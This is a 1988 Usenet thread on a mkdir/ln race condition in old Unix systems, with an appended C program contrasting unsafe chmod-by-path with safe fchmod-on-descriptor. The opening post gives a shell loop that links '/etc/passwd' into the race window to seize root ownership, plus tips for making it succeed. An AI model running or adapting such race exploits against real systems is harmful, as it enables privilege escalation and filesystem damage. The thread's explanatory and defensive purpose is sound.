blue@altger.UUCP (blue) (12/02/88)
I am probably saying something already known by everybody. Anyway, there's (was) a bug on many Unix systems, related to the mkdir and ln commands. Practically, ANYONE could be root on such systems, by working out a simple shell script like this one:

    while true
    do
        nice -39 mkdir foo &
        rm -rf foo
        ln /etc/passwd foo; rm -fr foo &
        ls -l /etc/passwd
    done

What happens is that sometimes - on old versions - you fool Unix by catching mkdir while it is creating its i-nodes. There has to be a millisecond while mkdir has created ITS foo, and is going to change ownership to yours. Ok, being new on Usenet maybe I missed this explanation 1000 times. What's incredible is that this trick worked out perfectly a few months ago on altger here, an Altos 386 running Unix Sys V.3, worked again on Unix/386 I think on an IBM PS-2/80, where instead of passwd /dev/hd00 was linked successfully (system: aragon). Worked still better on Altos Xenix 386 (Altos 2000?). If the "linker" does not work, all you have to do is change the nice value, add some slowdown, run two linkers at the same time, etc. Side effects: the file system will need to be checked out after reboot. Worst side effects: if this works, run by a hacker, you probably won't find any file system at all...
maart@cs.vu.nl (Maarten Litmaath) (12/07/88)
blue@altger.UUCP (blue) writes:
\ while true
\ do
\ nice -39 mkdir foo &
\ rm -rf foo
\ ln /etc/passwd foo; rm -fr foo &
\ ls -l /etc/passwd
\ done
This is precisely why nowadays there's a mkdir() system call!
Formerly the mkdir scheme was as follows:
mknod(path, S_IFDIR, dev);
/* now the directory exists, its owner is root and it's empty */
chown(path, uid, gid); /* now the owner is set */
chdir(path);
link(path, "."); /* make entry `.' in new directory */
link(parent, ".."); /* make entry `..' */
The `rm -rf foo; ln /etc/passwd foo' must `hit' right AFTER the mknod(), but
BEFORE the chown(). Due to race conditions this scheme will eventually succeed.
--
fcntl(fd, F_SETFL, FNDELAY): |Maarten Litmaath @ VU Amsterdam:
let's go weepin' in the corner! |maart@cs.vu.nl, mcvax!botter!maart
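The race both posts describe (blue's `rm -rf foo; ln /etc/passwd foo` loop, and Maarten's mknod-then-chown sequence) is a check-then-act hole: a privileged program creates an object and then goes back to the NAME to fix it up, and an attacker swaps what the name points to in between. The program below is an added illustration, not code from either poster. Its names (`legacy_create`, `safe_create`, `attacker_swap`, `run_demo`) are assumed for the example. To run unprivileged it uses chmod instead of chown and an ordinary file instead of a directory, and instead of winning the window by timing it calls the attacker between the two steps so the race always hits. The victim file is created in a scratch directory the program makes itself.

```c
#define _XOPEN_SOURCE 700
#include <fcntl.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/stat.h>
#include <unistd.h>

/*
 * Added illustration, not code from the thread. The "attacker" is a function
 * invoked between the two privileged steps so the window always hits; a real
 * attacker has to hit it by timing, which is what blue's loop is for.
 */

/* Attacker: swap the freshly created entry for a hard link to the victim
 * ("rm -rf foo; ln /etc/passwd foo" from the original loop). */
static void attacker_swap(const char *path, const char *victim)
{
    unlink(path);
    link(victim, path);
}

/* Legacy pattern (like mknod() followed by chown(path, ...)):
 * create, then fix up BY NAME. */
static int legacy_create(const char *path, const char *victim)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0)
        return -1;
    close(fd);
    attacker_swap(path, victim);   /* the race window */
    return chmod(path, 0600);      /* re-resolves the name: hits the victim */
}

/* Atomic pattern (what a real mkdir(2) gives you for directories):
 * operate on the descriptor of the object you created, never re-resolve. */
static int safe_create(const char *path, const char *victim)
{
    int fd = open(path, O_WRONLY | O_CREAT | O_EXCL, 0644);
    if (fd < 0)
        return -1;
    attacker_swap(path, victim);   /* same window, now harmless */
    int rc = fchmod(fd, 0600);     /* applies to OUR inode, not the victim */
    close(fd);
    return rc;
}

static int mode_of(const char *p)
{
    struct stat st;
    return stat(p, &st) == 0 ? (int)(st.st_mode & 07777) : -1;
}

/* Sets up a scratch dir with a 0644 victim file, runs one variant, cleans up,
 * and returns the victim's final permission bits (or -1 on setup failure). */
int run_demo(int use_safe)
{
    const char *base = getenv("TMPDIR");
    char dir[256], victim[320], path[320];
    int fd, rc, result;

    snprintf(dir, sizeof dir, "%s/mkdir-race-XXXXXX", base ? base : "/tmp");
    if (!mkdtemp(dir))
        return -1;
    snprintf(victim, sizeof victim, "%s/victim", dir);
    snprintf(path, sizeof path, "%s/foo", dir);

    fd = open(victim, O_WRONLY | O_CREAT, 0644);
    if (fd < 0)
        return -1;
    close(fd);
    chmod(victim, 0644);           /* explicit, so umask cannot skew the result */

    rc = use_safe ? safe_create(path, victim) : legacy_create(path, victim);
    result = (rc == 0) ? mode_of(victim) : -1;

    unlink(path);
    unlink(victim);
    rmdir(dir);
    return result;
}

int main(void)
{
    printf("legacy (chmod by path): victim mode now %04o\n", run_demo(0));
    printf("safe   (fchmod on fd):  victim mode now %04o\n", run_demo(1));
    return 0;
}
```

In the legacy variant the victim's mode ends up 0600: the second step trusted the name, and the name had been repointed. In the safe variant the victim is untouched, because the fix-up went through the descriptor of the inode the program actually created. That is the whole reason Maarten gives for mkdir(2): the kernel creates the directory already owned by the caller in one step, so there is no root-owned moment for `ln` to catch.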